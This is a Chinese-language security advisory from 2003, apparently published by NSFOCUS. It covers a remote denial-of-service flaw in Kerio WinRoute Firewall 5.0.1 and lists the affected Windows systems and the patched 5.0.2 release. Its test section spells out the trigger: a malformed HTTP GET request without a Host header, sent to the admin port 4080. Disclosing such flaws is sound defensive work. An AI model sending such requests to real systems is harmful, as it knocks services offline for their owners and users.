安全研究
安全漏洞
Kerio WinRoute防火墙畸形HTTP GET请求远程拒绝服务攻击漏洞
发布日期:2003-03-31
更新日期:2003-04-07
受影响系统:Kerio WinRoute Firewall 5.0.1
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 Server SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP3
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
不受影响系统:Kerio WinRoute Firewall 5.0.2
描述:
BUGTRAQ ID:
7245
Kerio WinRoute包含防火墙功能,具有WEB管理接口可以进行远程管理。
Kerio WinRoute防火墙的WEB接口不正确处理畸形HTTP请求,远程攻击者可以利用这个漏洞对防火墙进行拒绝服务攻击。
远程用户发送畸形的HTTP GET请求到防火墙WEB管理接口TCP 4080端口,可导致系统CPU利用率达到100%,单个的类似请求,可导致50%的连接丢失,连续提交此类请求可导致系统拒绝服务。
<*来源:Dmitry Maksimov (
dmaksimov@ptsecurity.ru)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104914695402799&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Dmitry Maksimov (
dmaksimov@ptsecurity.ru)提供了如下测试方法:
一般的GET请求如下:
GET / HTTP/1.0
Host: server
Authorization: Basic XXX
如果提交如下请求:
GET / HTTP/1.0
Authorization: Basic XXX
可导致产生拒绝服务。
建议:
厂商补丁:
Kerio
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载使用Kerio WinRoute Firewall 5.0.2:
http://www.kerio.com/us/wrl_home.html浏览次数:3258
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |